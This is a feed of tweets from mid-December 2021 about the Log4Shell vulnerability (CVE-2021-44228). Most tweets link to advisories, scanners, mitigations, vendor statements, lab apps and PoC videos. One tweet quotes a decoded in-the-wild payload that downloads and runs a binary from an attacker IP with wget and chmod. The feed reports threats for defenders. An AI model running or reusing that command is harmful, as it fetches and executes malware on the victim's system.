2021-12-15 22:31:19Suggested Read: The Numbers Behind Log4j CVE-2021-44228 - Check Point Software https://t.co/NapoA0UAiI https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/ChrisShort
2021-12-15 22:31:05Suggested Read: Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/mBUVKdN4ym https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ChrisShort
2021-12-15 22:30:29Log4Shell sample vulnerable Spark application (CVE-2021-44228) https://t.co/9ho2MtbNqv #log4j #log4shell https://github.com/kevinwallimann/log4shell-vulnerable-spark-appnigroeneveld
2021-12-15 22:30:20Log4j_checker.py (CVE-2021-44228) https://t.co/n1D5kl4srE #log4j #log4shell https://github.com/lfama/log4j_checkernigroeneveld
2021-12-15 22:24:59Log4Shell-Rex: The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228) ex… https://t.co/1ngYRT88ai https://twitter.com/i/web/status/1471241700614021132nigroeneveld
2021-12-15 22:24:26AWS has published a DaemonSet to help mitigate the impact of #Log4j2 CVE-2021-44228 on #Kubernetes clusters until… https://t.co/cW50BAENHC https://twitter.com/i/web/status/1471242083046354947nctaber
2021-12-15 22:21:16NEW BLOG: Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint &amp; Microsoft Sentinel for detecting/alerting… https://t.co/pu91KAQxAI https://twitter.com/i/web/status/1471223988659630090JeffreyAppel7
2021-12-15 22:14:43@JaroslavTulach How are you personally doing with CVE-2021-44228 if I may ask?xtrodev
2021-12-15 22:14:37Umbraco CMS and Cloud NOT affected by CVE-2021-44228 - Log4j RCE 0-day mitigation. Read more here 👉… https://t.co/T2IzzX2Zyv https://twitter.com/i/web/status/1471238792648531982myscandia
2021-12-15 22:14:06Portainer statement re Log4J CVE-2021-44228 https://t.co/AWTxp1jSMe #Log4J #Log4Shell https://bit.ly/3IUHGD2portainerio
2021-12-15 22:11:16¿Tanto pex por el CVE-2021-44228? creí que todo ya era DEVOPS CI/CD 100 deploys al día, basta con subirle la versión al Log4j en el pom.xml.oscar__castillo
2021-12-15 22:04:46Log4J Scanner: Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth https://t.co/voUHfjLeRS #log4j #log4shell https://github.com/0xDexter0us/Log4J-Scannernigroeneveld
2021-12-15 22:02:48SAP has identified 32 apps that are affected by CVE-2021-44228 – the critical vulnerability in the Apache Log4j Jav… https://t.co/NZFTkToLpF https://twitter.com/i/web/status/1471237127178539013gc_defense
2021-12-15 22:02:42Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popu… https://t.co/k1SjBMlUzc https://twitter.com/i/web/status/1471237157415182342nigroeneveld
2021-12-15 22:02:37CVE-2021-44228-Log4Shell-Hashes https://t.co/pmx2aCt9gB #log4j #log4shell https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashesnigroeneveld
2021-12-15 22:02:06CVE-2021-44228 Log4Shell Detection #news #technology #cybersecurity #infosec #hacker #cyberattack #phishing… https://t.co/IAibRKtIsD https://twitter.com/i/web/status/1471237379709145089LanceSchukies
2021-12-15 22:01:50New update to generic rule 1005 in our blog post on mitigation of the #log4j / #log4shell / CVE-2021-44228. Potent… https://t.co/JoGPGhPFoI https://twitter.com/i/web/status/1471237441814212616CoreRuleSet
2021-12-15 22:01:13Log4j-log4shell-affected: Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell o… https://t.co/35X8aOiNea https://twitter.com/i/web/status/1471237591756333062nigroeneveld
2021-12-15 21:51:54This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-44228… https://t.co/aD6LFkdfy7 https://twitter.com/i/web/status/1471234192466124800nigroeneveld
2021-12-15 21:51:30Log4jpwn - This repository contains an intentionally vulnerable playground to play with CVE-2021-44228 (aka: log4sh… https://t.co/mTCPblWAQR https://twitter.com/i/web/status/1471234946098515970nigroeneveld
2021-12-15 21:51:26CVE-2021-44228 know as log4Shell allows remote unauthenticated attackers with the ability to inject text into log m… https://t.co/1gxJObONol https://twitter.com/i/web/status/1471234953295839237saadutmanzai
2021-12-15 21:44:45Added an example python honeypot for those looking to catch log4j (CVE-2021-44228) exploitation attempts https://t.co/hkX86tlGut https://github.com/MalwareTech/Log4jToolsMalwareTechBlog
2021-12-15 21:44:41Nmap NSE scripts for log4shell or LogJam detection (CVE-2021-44228) https://t.co/IS958PgtQU https://t.co/ZuzCB5AjxY https://fuzzywords.ivityc.org/nmap-nse-scripts-for-log4shell-or-logjam-detection-cve-2021-44228/Ivityc
2021-12-15 21:43:16Exploitation of Log4j CVE-2021-44228 #news #technology #cybersecurity #infosec #hacker #cyberattack #phishing… https://t.co/uan86RgGzq https://twitter.com/i/web/status/1471232346670129162LanceSchukies
2021-12-15 21:40:52SCN: Support Spotlight: CVE-2021-44228 for log4j and what it means for SAP Business One https://t.co/OrOTxf2Ynk https://ift.tt/3yuoasasapCommBlogs
2021-12-15 21:40:39Log4j PoC - CVE-2021-44228 https://t.co/exubXqlupJ #log4j #log4shell https://www.youtube.com/watch?v=nAmvAenPfoYnigroeneveld
2021-12-15 21:40:19Log4Shell sample vulnerable application (CVE-2021-44228) https://t.co/h740xoXbqV #log4j #log4shell https://github.com/r00tkiiT/log4shell-vulnerable-appnigroeneveld
2021-12-15 21:30:50Apache Log4j ACE exploit PoC in Minecraft (Log4Shell/CVE-2021-44228) https://t.co/S3TuHRE2cu #log4j #log4shell #minecraft https://www.youtube.com/watch?v=eEZjBTtZbAo#post-0nigroeneveld
2021-12-15 21:30:41Log4shell | Remote Code Execution | 0day | CVE-2021-44228 | POC https://t.co/kc7qJdgmqi #log4j #log4shell https://www.youtube.com/watch?v=oz6OJgTd9Ms#post-6nigroeneveld
2021-12-15 21:30:20CVE-2021-44228 Impact of Log4j Vulnerability CVE-2021-44228 (Severity: CRITICAL) - https://t.co/OZnijJYYyq https://t.co/oCiYDYYxSw https://www.invisibleciso.com/12370987/cve-2021-44228-impact-of-log4j-vulnerability-cve-2021-44228-severity-critical?via=twCisoInvisible
2021-12-15 21:30:16Log4j | Reverse Shell | 0day | CVE-2021-44228 | POC | Log4shell https://t.co/g8nb0sodgp #log4j #log4shell https://www.youtube.com/watch?v=JOZld5FfDik#post-4nigroeneveld
2021-12-15 21:21:09log4j-scan v1.0- A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 on hosts.… https://t.co/pK1WtoAeeE https://twitter.com/i/web/status/1471227443180670983GeekOnTheLoose
2021-12-15 21:20:52CVE-2021-44228 no sabes cuánto te odiounaim1
2021-12-15 21:11:41Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) – Sysdig https://t.co/PBgI6PB3qN https://aeternusmalus.wordpress.com/2021/12/15/exploiting-and-mitigating-cve-2021-44228-log4j-remote-code-execution-rce-sysdig/d34dr4bbit
2021-12-15 21:10:35Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/73eSwSFHQK https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/DigitalMaddox
2021-12-15 21:02:07Our latest blog digs into how CVE-2021-44228 (#Log4Shell) permits a Remote Code Execution (RCE) allowing the attack… https://t.co/gPwRe96yrE https://twitter.com/i/web/status/1471221034003177478mdandersen
2021-12-15 21:01:16Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート https://t.co/Yj12I1NVMK https://www.intellilink.co.jp/column/vulner/2021/121500.aspxzephel01
2021-12-15 21:01:13#Log4j Security Vulnerabilities CVE-2021-44228 – Mitigation Strategies for @VmareTanzu Application Services (#TAS)… https://t.co/YLxaZkvC9u https://twitter.com/i/web/status/1471221834842521610JSussner
2021-12-15 21:00:54#Log4Shell #log4j CVE-2021-44228 It looks like @VMware @VMwareSRC updated their advisory to include CVE-2021-4504… https://t.co/mxdUFRZnFf https://twitter.com/i/web/status/1471222576169037832TomSellers
2021-12-15 21:00:40Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/cNnMqaQrgL @jpcert https://www.jpcert.or.jp/at/2021/at210050.htmlPanF5
2021-12-15 21:00:23#log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228 https://t.co/zG6CNDlA4L https://blog.fox-it.com/2021/12/14/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/amp/cyberguideme
2021-12-15 20:52:01Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/hwhiyhQYCm https://www.reddit.com/r/netsec/comments/rh4k21/exploiting_and_mitigating_cve202144228_log4j/Dinosn
2021-12-15 20:51:47Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/ZXd28MO02y https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046Robofarm
2021-12-15 20:51:43Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/RNPYxep9yB #programming https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ThisIsWhyICode
2021-12-15 20:50:46@gadievron @rickhanlonii Breaking: Russia has announced it has developed a patch against CVE-2021-44228 that is 99.999% effective!as_w
2021-12-15 20:40:11Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/0XdXoqUuvy https://dy.si/RbcGGDtpau06
2021-12-15 20:40:09The Everyperson’s Guide to Log4Shell (CVE-2021-44228) - https://t.co/g8rR9XMdtj https://blog.rapid7.com/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/ka0com
2021-12-15 20:30:35@syzygiess There is now CVE-2021-44228 as well. Along with all the others. Busy rest of the year!lotusninja2
2021-12-15 20:30:31Dealing with log4shell aka CVE-2021-44228 aka the log4j https://t.co/FVV7wgtNX1 #csa #log4j #soc https://cloudsecurityalliance.org/articles/dealing-with-log4shell-aka-cve-2021-44228-aka-the-log4j-version-2/opexxx
2021-12-15 20:30:23#ThreatHorizon: SECOND UPDATE: Log4Shell –CVE-2021-44228 –Apache Log4j Vulnerability https://t.co/LZ25xiAvAZ Conti… https://t.co/ip47DXFZv1 https://lnkd.in/d2w2ud9s https://twitter.com/i/web/status/1471214765724909570ITC_secure
2021-12-15 20:30:22#VMSA-2021-0028 - #VMware Response to Apache #Log4j Remote Code Execution Vulnerability (CVE-2021-44228) Please se… https://t.co/nENLCGr0su https://twitter.com/i/web/status/1471214780970983425Dejify
2021-12-15 20:23:00fullhunt/log4j-scan: A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 https://t.co/htd9Ck7BeM https://github.com/fullhunt/log4j-scanpinboard_pop
2021-12-15 20:22:57Our latest blog digs into how CVE-2021-44228 (#Log4Shell) permits a Remote Code Execution (RCE) allowing the attack… https://t.co/k2Yr82U0Zl https://twitter.com/i/web/status/1471208489410342918sysdig
2021-12-15 20:22:53Rapid7 Blog | The Everyperson’s Guide to Log4Shell (CVE-2021-44228) https://t.co/hvBj2bpeL9 https://bit.ly/3EYJJ6PStopMalvertisin
2021-12-15 20:22:44log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch. It… https://t.co/IqmcRIydIP https://twitter.com/i/web/status/1471208868856442881AlirezaGhahrood
2021-12-15 20:21:21Dealing with log4shell aka CVE-2021-44228 https://t.co/k4jFFDIGv6 https://www.haktechs.com/latest-hacking-news/malware-updates/dealing-with-log4shell-aka-cve-2021-44228/HakTechs
2021-12-15 20:21:12Is Your Web Application Exploitable By Log4Shell (CVE-2021-44228) Vulnerability? https://t.co/hwF9Af2kPo https://t.co/QPbAwwZZtZ http://ow.ly/G6K6103frs2TechSpective
2021-12-15 20:16:52The Everyperson’s Guide to Log4Shell (CVE-2021-44228) https://t.co/nS1aQIgiZf https://t.co/sg7pe1asXH http://dlvr.it/SFRgYGAcooEdi
2021-12-15 20:14:06Google Cloud Armor WAF rule to help mitigate CVE-2021-44228 Apache Log4j vulnerability @googlecloud https://t.co/pz6R4HsLjf https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability/opexxx
2021-12-15 20:12:29En train de regarder les impacts de #CVE-2021-44228 et maintenant de #CVE-2021-45046 sur les solutions logicielles… https://t.co/6orRNeXyhc https://twitter.com/i/web/status/1471210577452310537egwada
2021-12-15 20:11:59Google Cloud recommendations for investigating and responding to the Apache “Log4j 2” vulnerability (CVE-2021-44228… https://t.co/3guRu4AyFU https://twitter.com/i/web/status/1471210583890358272rchan326
2021-12-15 20:11:33Inside the Log4j2 vulnerability (CVE-2021-44228) https://t.co/JrWaeXTZwE http://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/PekelAhmet
2021-12-15 20:10:58SAP has identified 32 apps that are affected by CVE-2021-44228 – the critical vulnerability in the Apache Log4j Jav… https://t.co/azS0RB0565 https://twitter.com/i/web/status/1471210727377563650swisstfrazer
2021-12-15 20:06:54Spring Boot Log4j - CVE-2021-44228 Docker Lab https://t.co/nJqhDMEBMl https://reposhub.com/java/web-frameworks/twseptian-Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab.htmlKoAkinci
2021-12-15 20:04:56@Ericom_Software Customers — Staying Ahead of CVE-2021-44228 https://t.co/uNJqsxjXMr https://securityboulevard.com/2021/12/ericom-customers-staying-ahead-of-cve-2021-44228/davidcanellos
2021-12-15 20:02:48これか。おぉ・・・昨日から攻撃ポート動向も少し変化してますね。 「Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について」ー警察庁 https://t.co/Sj9Cc36E09 https://www.npa.go.jp/cyberpolice/important/2021/202112141.htmlfoxbook
2021-12-15 20:01:45Support Spotlight: CVE-2021-44228 for log4j and what it means for SAP Business One https://t.co/Qh3URKpJiw #itpfed https://blogs.sap.com/2021/12/15/support-spotlight-cve-2021-44228-for-log4j-and-what-it-means-for-sap-business-one/?utm_source=dlvr.it&utm_medium=twitteritpfed
2021-12-15 20:01:28CVE-2021-44228 is a 10pdevpython
2021-12-15 20:00:42New data and insights into Log4Shell attacks (CVE-2021-44228) | Fastly https://t.co/rADJQpqPDu https://buff.ly/3oWXIEschris_foulon
2021-12-15 20:00:25Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/7WfyflCM4x https://t.co/a1AgNjkGLF http://dlvr.it/SFRfBVdjonesax
2021-12-15 19:54:30Explosive ramp-up of the attacks. "The Numbers Behind Log4j CVE-2021-44228 - Check Point Software"… https://t.co/qGhcKXQUTz https://twitter.com/i/web/status/1471205035501572105tguemes
2021-12-15 19:54:12Alerta de seguridad: vulnerabilidad día-cero de #Apache Log4j #Log4Shell con ejecución remota (CVE-2021-44228) está… https://t.co/8SRgcaHF0R https://twitter.com/i/web/status/1471205067919351814TrendMicroLATAM
2021-12-15 19:53:31「Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起」JPCERT/CC #1215一部更新有 https://t.co/UwGjGLNLUo https://www.jpcert.or.jp/at/2021/at210050.htmlfoxbook
2021-12-15 19:48:14Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/lRIeF05PX5 https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/El_Grillo1
2021-12-15 19:47:55Google Cloud recommendations for investigating and responding to the Apache “Log4j 2” vulnerability (CVE-2021-44228… https://t.co/MVMfuCPV0h https://twitter.com/i/web/status/1471198968839573506vineethphp
2021-12-15 19:43:32There's a special place for "research firms" likely scanning for CVE-2021-44228 and DDOS an organization... #log4j https://t.co/44frpdsd4nbrgarnett
2021-12-15 19:41:54We've been asked whether our apps are affected by #Log4Shell (CVE-2021-44228). None of our apps use or have Java de… https://t.co/LhoTCyPM7W https://twitter.com/i/web/status/1471202947291877387intuitibits
2021-12-15 19:41:42A few people have reached out and asked if Wireshark is affected by log4j / CVE-2021-44228. We're not. https://t.co/CQiZKWm7hc https://gitlab.com/wireshark/wireshark/-/issues/17783WiresharkNews
2021-12-15 19:33:43Ericom Customers — Staying Ahead of CVE-2021-44228 https://t.co/2fCB2ULTb8 https://securityboulevard.com/2021/12/ericom-customers-staying-ahead-of-cve-2021-44228/security_inside
2021-12-15 19:31:57#Log4jVulnerability 3 The vulnerability, CVE-2021-44228, allows for remote code execution against users with certa… https://t.co/HOOQkioKsY https://twitter.com/i/web/status/1471196393935101957paddyrags
2021-12-15 19:31:15Example CVE-2021-44228 payload (decoded): wget http://152.67.63.150/py; chmod 777 py; ./py; rce.x86 Type: DDoS (Mi… https://t.co/iag2sWFjis https://twitter.com/i/web/status/1471196468908228614bad_packets
2021-12-15 19:30:34How to detect #Log4Shell #log4j vulnerable traffic (CVE-2021-44228) from packet trace using #wireshark? Just use W… https://t.co/oAjyubqvCk https://twitter.com/i/web/status/1471196548008660992_edward5
2021-12-15 19:24:21#Log4j Security Vulnerabilities CVE-2021-44228 – Mitigation Strategies for Tanzu Application Services (#TAS) Operat… https://t.co/UVzBhvcb2s https://twitter.com/i/web/status/1471198040878989312thefluffysysop
2021-12-15 19:23:50El Reg today spotted #Apache's #Log4j 2.x – vulnerable to a remote code execution hole CVE-2021-44228 – among… https://t.co/3szJy8oznF https://twitter.com/i/web/status/1471193489673175043GadflyQuebec
2021-12-15 19:17:42Extra! Extra! Read all about it! CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution V… https://t.co/Ezu1HHUR6u https://twitter.com/i/web/status/1471190839808253953CTOUniverse
2021-12-15 19:16:42List of vendors and software affected by the Apache Log4J vulnerability (CVE-2021-44228) (Updated) https://t.co/B1648plW1y http://dlvr.it/SFRWvnProHacktives
2021-12-15 19:14:06log4j / CVE-2021-44228 ! In the 2010th it was said that Java must be abandonned due to the lack of security. Then… https://t.co/v3X096oDDP https://twitter.com/i/web/status/1471195229613137921PhilSoupart
2021-12-15 19:12:13The team at @MiltonSecurity has been tracking log4j since CVE-2021-44228 was released. If you need to report an inc… https://t.co/2VBp2yZG0g https://twitter.com/i/web/status/1471195701526814720alan_arv
2021-12-15 19:11:58CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/hLmRCARXhX Thank you @_JohnHammond Great video https://youtu.be/7qoPDq41xhQruisfda
2021-12-15 19:10:31Fermín J. Serna on LinkedIn: Log4j2 Vulnerability (CVE-2021-44228) Research and Assessment - The https://t.co/6OAh7jU9PE https://hubs.ly/Q010NJJg0DeNexusInc1
2021-12-15 19:07:01The exploitation of a vulnerability named Log4Shell (CVE-2021-44228) https://t.co/vcwykH5JQs http://www.hackersnotes.com/blog/thm/the-exploitation-of-a-vulnerability-named-log4shell-cve-2021-44228/kryptohaker
2021-12-15 19:06:21How to Automatically Mitigate Log4Shell via a Live Patch (CVE-2021-44228 + CVE-2021-45046) https://t.co/rKoCxY3Wt5 https://www.lunasec.io/docs/blog/log4shell-live-patch/greyhathackr
2021-12-15 19:02:44An update on the Apache Log4j CVE-2021-44228 vulnerability - IBM PSIRT Blog (https://t.co/81ebXOLeGi) https://buff.ly/3m6WlBidtoczala
2021-12-15 18:53:26New post: "Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE)" https://t.co/Obte62gwOv https://ift.tt/3GNBECiMyinfosecfeed
2021-12-15 18:51:21Waterfall products do not use the Apache Log4j software module and do not exhibit the CVE-2021-44228 vulnerability… https://t.co/CXAIl32EXu https://twitter.com/i/web/status/1471190727187124225WaterfallSecure
2021-12-15 18:51:05@WaterfallSecure products do not use the Apache Log4j software module and do not exhibit the CVE-2021-44228 vulnera… https://t.co/oS6UQqoK0R https://twitter.com/i/web/status/1471190727979900941FrenkelLior
2021-12-15 18:49:30Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 12M (audience size) CVE-2021-45046: 5.9M CVE-2021-4389… https://t.co/SKOPUCc98H https://twitter.com/i/web/status/1471185849945661446CVEtrends
2021-12-15 18:46:44■■■■□ Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/WL0V8StZ1x https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/cKure7
2021-12-15 18:44:18#VMware has released a security advisory for 'VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-002… https://t.co/7fLwYNoNbC https://twitter.com/i/web/status/1471187418946707468cc_cyberdefence
2021-12-15 18:43:07Ik kan het u alvast vertellen; Citrix Xenmobile server is kwetsbaar voor CVE-2021-44228 #log4JPSafe_NL
2021-12-15 18:41:21All our UniFi controllers were on 6.5.54 to fix CVE-2021-44228, and today all are in 6.5.55 which patches CVE-2021-45046.controllific
2021-12-15 18:31:28Agenda - CVE-2021-44228 / Log4Shell / kwetsbaarheid in de Log4j-library - publicatie https://t.co/c5yM5rKybm https://t.co/SAsbcvSmt7 https://www.google.com/calendar/event?eid=MWN0bTMxdmloajF2ajkxajJkYzhyaTY1dHYgYTN2ZWVuQG0&ctz=Europe/Amsterdama3veen
2021-12-15 18:31:02Suggested Read: Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228) | LunaSec https://t.co/bo6EYKH0ag https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/ChrisShort
2021-12-15 18:30:26fullhunt/log4j-scan: A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 https://t.co/7tdImUYCWc https://github.com/fullhunt/log4j-scannuncapops
2021-12-15 18:26:27Exploiting CVE-2021-44228: Log4j Remote Code Execution (RCE) and mitigating with @sysdig https://t.co/o33pM6tGpL https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/rayheffer
2021-12-15 18:24:25Electrification and Digitalization Policy: Cyber Pandemic: The Numbers Behind Log4j Vulnerability CVE-2021-44228 –… https://t.co/tSjqQZ4naT https://twitter.com/i/web/status/1471181983820693510MacroMidday
2021-12-15 18:20:22#Apache #Log4j Vulnerabilities (CVE-2021-44228) for #Nutanix #ILTA #LegalIT https://t.co/Da6uuRt67U https://www.helient.com/2021/12/apache-log4j-vulnerabilities-cve-2021-44228-for-nutanix/Helient
2021-12-15 18:19:19Newest Log4j Security Vulnerability - CVE-2021-44228 - Log4Shell https://t.co/KTXxj2fTyT @styrainc https://bit.ly/3s4FYsSthenewstack
2021-12-15 18:18:00A critical vuln popped up last week, CVE-2021-44228, affecting the Apache Log4j library. With a risk score higher t… https://t.co/0CJufpDZJp https://twitter.com/i/web/status/1471179182189260801KennaSecurity
2021-12-15 18:13:30Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec… https://t.co/lt9P3ZXQrB https://twitter.com/i/web/status/1471179749741506565RProgramming200
2021-12-15 18:11:15Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog |… https://t.co/qSMGJdvCbE https://twitter.com/i/web/status/1471179840946642945JeffEnglander
2021-12-15 18:01:45Some vendors are trying to claim they aren't vulnerable to CVE-2021-44228 because they don't have Java services exp… https://t.co/RdzEf5o1MN https://twitter.com/i/web/status/1471177128590733312chort0
2021-12-15 18:01:38Una segunda vulnerabilidad Log4Shell ▶️ log4j (CVE-2021-44228 + CVE-2021-45046) https://t.co/GEm5ih4XbQ https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/elhackernet
2021-12-15 18:01:18Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/uj2DbpW3Nh #infosec… https://t.co/SeMFSZMPWy https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ https://twitter.com/i/web/status/1471177405058277376beingsheerazali
2021-12-15 18:00:42CVE-2021-44228: How to fix CVE-2021-44228 in production environments https://t.co/noV5fh3vDR https://bit.ly/3F3QlkkBinaryBlogger
2021-12-15 18:00:25Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) via /r/netsec https://t.co/imjtewCENg… https://t.co/NHpOHulRO5 https://ift.tt/3pYLKK3 https://twitter.com/i/web/status/1471178176311304201CybrXx0
2021-12-15 17:53:30Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/GDOT60OLNN https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/_r_netsec
2021-12-15 17:52:14Make finding successful #log4j (CVE-2021-44228) exploits easier with our new @Zeekurity-based detections that link… https://t.co/LKOR4Qyzt7 https://twitter.com/i/web/status/1471174885313445888corelight_inc
2021-12-15 17:51:16Is there any indication that #log4j ports (like log4net) are affected by CVE-2021-44228?infosecbryan
2021-12-15 17:50:20I wrote about how Nanitor VulnScan reacts to the infamous vulnerability CVE-2021-44228. Now when I would like to go… https://t.co/6aCW9bYMZb https://twitter.com/i/web/status/1471175643740131338joikulp
2021-12-15 17:41:40#Cisco released a lot of fixes for the https://t.co/hAvABvLRzP #CVE-2021-44228 - Apache #Log4J https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdwbontekoe
2021-12-15 17:40:06@certcc I've updated the scanning scripts for CVE-2021-44228 to be a bit more functional. In addition to searching… https://t.co/oXZTvV0P4r https://twitter.com/i/web/status/1471173157184806917wdormann
2021-12-15 17:34:37Collection of scanning software from the Dutch NCSC relating to CVE-2021-44228 #Log4Shell ✅ Vulnerability Detectio… https://t.co/0jlWVvH1EH https://twitter.com/i/web/status/1471163431332073472d4rkshell
2021-12-15 17:34:28Given how similar CVE-2021-44228 is to a shell injection attack, it’s remarkable it wasn’t stumbled upon earlier._chadlagore
2021-12-15 17:33:42Is Your Web Application Exploitable By Log4Shell (CVE-2021-44228) Vulnerability?: On December 09, 2021, a critical… https://t.co/kmNI8OQNNW https://twitter.com/i/web/status/1471165676555362311shah_sheikh
2021-12-15 17:33:41Is Your Web Application Exploitable By Log4Shell (CVE-2021-44228) Vulnerability? https://t.co/R0iTcXU0uy https://t.co/CfsnKhgiiu http://dlvr.it/SFRB7vAcooEdi
2021-12-15 17:33:23#Log4Shell by the numbers- Why did CVE-2021-44228 set the Internet on Fire? https://t.co/WfZaCG8bQR https://blog.sonatype.com/why-did-log4shell-set-the-internet-on-fire?utm_campaign=Q4%202021%3A%20Log4J-Webinar&utm_medium=email&_hsmi=195692685&utm_content=195692685&utm_source=hs_emailvladserbu
2021-12-15 17:33:18Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog https://t.co/HpI1m6E9D5 https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/azuretracks
2021-12-15 17:33:09UPDATED Cybereason vaccine prevents exploitation of #Apache #Log4Shell vulnerabilities (CVE-2021-44228 and CVE-2021… https://t.co/Zht2Gd4iZ5 https://twitter.com/i/web/status/1471167287348584454cybereason
2021-12-15 17:32:59Since public disclosure of the Apache Log4j Zero Day Vulnerability CVE-2021-44228 nicknamed “Log4Shell”. GlobalSign… https://t.co/8I1MSMAgzf https://twitter.com/i/web/status/1471167676827545614grazie1110
2021-12-15 17:31:42Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/9geSbsE2lZ どういう脆弱性かの詳しい分析はこうして出て… https://t.co/97mlpcTFna https://www.intellilink.co.jp/column/vulner/2021/121500.aspx https://twitter.com/i/web/status/1471168691882827776piro_or
2021-12-15 17:31:34Dear Customers, kindly be noted that Protectimus 2FA Service is NOT affected by CVE-2021-44228 Vulnerability!… https://t.co/pXCg88ykLk https://twitter.com/i/web/status/1471169120230125580Protectimus
2021-12-15 17:31:32Liste des systèmes utilisant Log4j qui sont potentiellement affectés par la vulnérabilité Log4Shell (CVE-2021-44228… https://t.co/7thReNzjJW https://twitter.com/i/web/status/1471169185040543748belverus_
2021-12-15 17:30:57IBM hat ein Update on the Apache Log4j CVE-2021-44228 vulnerability sowie ein Release Mitigation patch for EKMF bet… https://t.co/NPUJclcKYe https://twitter.com/i/web/status/1471170344492875784empalis
2021-12-15 17:28:02Cybereason released a vaccine that prevents exploitation of #Log4Shell vulnerabilities (CVE-2021-44228 and CVE-2021… https://t.co/fU5boYj7FI https://twitter.com/i/web/status/1471163869322227720anthonymfreed
2021-12-15 17:23:19📦 python-log4rce ⭐ 118 (+34) 🗒 Python An All-In-One Pure Python PoC for CVE-2021-44228 https://t.co/5wfBO3nJc1 https://github.com/alexandre-lavoie/python-log4rcegh_trending_
2021-12-15 17:16:10Apache Log4j-Sicherheitslücke CVE-2021-44228: Sind HCL Notes, Domino, Sametime, Connections usw. betroffen? https://t.co/rge2p0bKCz http://dlvr.it/SFR9Kpplanetntf
2021-12-15 17:11:36The Numbers Behind Log4j CVE-2021-44228 - Check Point Software #cybersecurity https://t.co/3wnUKLXSBb by @checkpointsw https://hubs.la/Q010QZP70Pendello
2021-12-15 17:09:10Azure WAFはカスタムルールの設定しなくてもlog4jの脆弱性(CVE-2021-44228)対策が行えるようになったようです。マネージドルールで対応可能になりました。 #azure #log4j #waf https://t.co/6ItDXF7RN0 https://level69.net/archives/28320jkudo
2021-12-15 17:04:04各社クラウドプロバイダのWAFでlog4jの脆弱性(CVE-2021-44228)対策をマネージドルールで対応できるようになったな。ただ、見た感じAzureが様々手法で検出したり防御したりできるんだな。多層防御の実践ってやつ?jkudo
